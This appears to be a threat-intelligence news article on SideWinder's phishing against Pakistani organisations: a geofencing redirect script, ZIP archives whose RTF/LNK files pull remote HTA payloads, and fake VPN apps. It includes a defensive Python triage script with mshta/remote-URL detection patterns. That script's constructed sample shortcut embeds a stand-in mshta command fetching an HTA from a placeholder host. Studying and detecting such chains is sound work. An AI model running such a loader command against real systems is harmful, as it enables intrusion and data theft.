SideWinder hackers target Pakistani entities using fake Android VPN apps


SideWinder, also tracked under the monikers Hardcore Nationalist, Rattlesnake, Razor Tiger, and T-APT-04, has been active since at least 2012 with a primary focus on Pakistan and other Central Asian countries like Afghanistan, Bangladesh, Nepal, Singapore, and Sri Lanka. Last month, Kaspersky attributed to this group over 1,000 cyber attacks that took place in the past two years, while calling out its persistence and sophisticated obfuscation techniques.

SideWinder, a threat actor notorious for phishing assaults targeting Pakistani public and private sector organisations, has added a new unique tool to its malware arsenal. “The gang’s principal attack vectors are phishing URLs in emails or postings that resemble genuine announcements and services of government agencies and organisations in Pakistan,” Group-IB, a Singapore-based cybersecurity firm, stated in a Wednesday report.

Highlights

  • The custom tool identified by Group-IB, dubbed SideWinder.AntiBot.Script, acts as a traffic direction system that diverts Pakistani users who click the phishing links to rogue domains. If the client IP address of a user who clicks the link is not in Pakistan, the AntiBot script instead redirects to an authentic document hosted on a legitimate server, indicating an attempt to geofence its targets. “The script checks the client browser environment and, based on several parameters, decides whether to issue a malicious file or redirect to a legitimate resource,” the researchers said.

  • The threat actor’s modus operandi involves the use of spear-phishing emails to distribute malicious ZIP archives containing RTF or LNK files, which download an HTML Application (HTA) payload from a remote server. This is achieved by embedding fraudulent links that are designed to mimic legitimate notifications and services of government agencies and organizations in Pakistan, with the group also setting up lookalike websites posing as government portals to harvest user credentials.
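The ZIP -> RTF/LNK -> HTA chain in the second highlight is something a mail gateway or SOC can triage statically before any link is followed. The Python script below is an added example written for this page, not Group-IB's tooling or an artefact from the campaign; the indicator strings, the sample archive it builds and the verdict thresholds are constructed assumptions for illustration.

```python
"""Static triage of a ZIP attachment for the RTF/LNK -> remote HTA pattern.

Added example: the patterns and the sample archive are constructed for
illustration and are not the group's real artefacts.
"""
import io
import re
import zipfile

# Entry types inside a ZIP that warrant inspection for this chain.
SUSPICIOUS_EXT = {".rtf", ".lnk"}

# Strings a shortcut carries when it launches the HTA host against a remote payload.
LNK_PATTERNS = {
    "mshta": re.compile(rb"mshta(\.exe)?", re.I),
    "remote-url": re.compile(rb"https?://[^\s\"']+", re.I),
    "hta-payload": re.compile(rb"\.hta\b", re.I),
}
# RTF control words that introduce embedded OLE objects, the usual loader carrier.
RTF_PATTERNS = {
    "ole-object": re.compile(rb"\\objdata|\\objupdate|\\objemb", re.I),
}
LNK_HEADER = b"\x4c\x00\x00\x00"  # HeaderSize field that opens a Windows Shell Link


def _views(content: bytes) -> list:
    """Raw bytes plus a UTF-16LE-decoded view, because LNK string data is wide."""
    wide = content.decode("utf-16-le", errors="ignore").encode("utf-8", errors="ignore")
    return [content, wide]


def triage_zip(archive: bytes) -> list:
    """Inspect every RTF/LNK entry in the ZIP and list the indicators each one hits."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            # rsplit keeps the real extension of double-extension names like "x.pdf.lnk"
            ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if ext not in SUSPICIOUS_EXT:
                continue
            content = zf.read(info)
            patterns = LNK_PATTERNS if ext == ".lnk" else RTF_PATTERNS
            hits = [label for label, pat in patterns.items()
                    if any(pat.search(view) for view in _views(content))]
            if ext == ".lnk" and content.startswith(LNK_HEADER):
                hits.append("lnk-header")
            findings.append({"entry": name, "type": ext[1:], "indicators": sorted(hits)})
    return findings


def verdict(findings: list) -> str:
    """block: shortcut calls mshta with a remote URL, or RTF embeds an OLE object.
    review: suspicious entry types present but no strong indicator.  clean: nothing."""
    for f in findings:
        ind = set(f["indicators"])
        if {"mshta", "remote-url"} <= ind or "ole-object" in ind:
            return "block"
    return "review" if findings else "clean"


def build_sample_archive() -> bytes:
    """Constructed sample archive. The .lnk entry is not a valid shortcut, only the
    4-byte header plus the wide string such a shortcut would carry; the RTF is benign."""
    fake_lnk = LNK_HEADER + b"\x00" * 72 + (
        "C:\\Windows\\System32\\mshta.exe http://notice.example.invalid/update.hta"
    ).encode("utf-16-le")
    benign_rtf = b"{\\rtf1\\ansi Circular: office timings remain unchanged.}"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Notification.pdf.lnk", fake_lnk)
        zf.writestr("Circular.rtf", benign_rtf)
        zf.writestr("readme.txt", b"nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    results = triage_zip(build_sample_archive())
    for f in results:
        print(f)
    print("verdict:", verdict(results))
```

The sample shortcut exists only to exercise the UTF-16 scan; in production `_views` would give way to a real Shell Link parser that walks the LinkInfo and StringData sections, and the RTF check should be paired with an OLE extractor, since `\objdata` payloads are hex-encoded and the object type matters more than the control word itself.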

In January 2020, Trend Micro detailed three malicious apps that were disguised as photography and file manager tools that leveraged a security flaw in Android (CVE-2019-2215) to gain root privileges as well as abuse accessibility service permissions to harvest sensitive information.

Of special mention is a phishing link that downloads a VPN application called Secure VPN (“com.securedata.vpn”) from the official Google Play store in an attempt to impersonate the legitimate Secure VPN app (“com.securevpn.securevpn”). While the exact purpose of the fake VPN app remains unclear, this is not the first time SideWinder has sneaked past Google Play Store protections to publish rogue apps under the pretext of utility software.

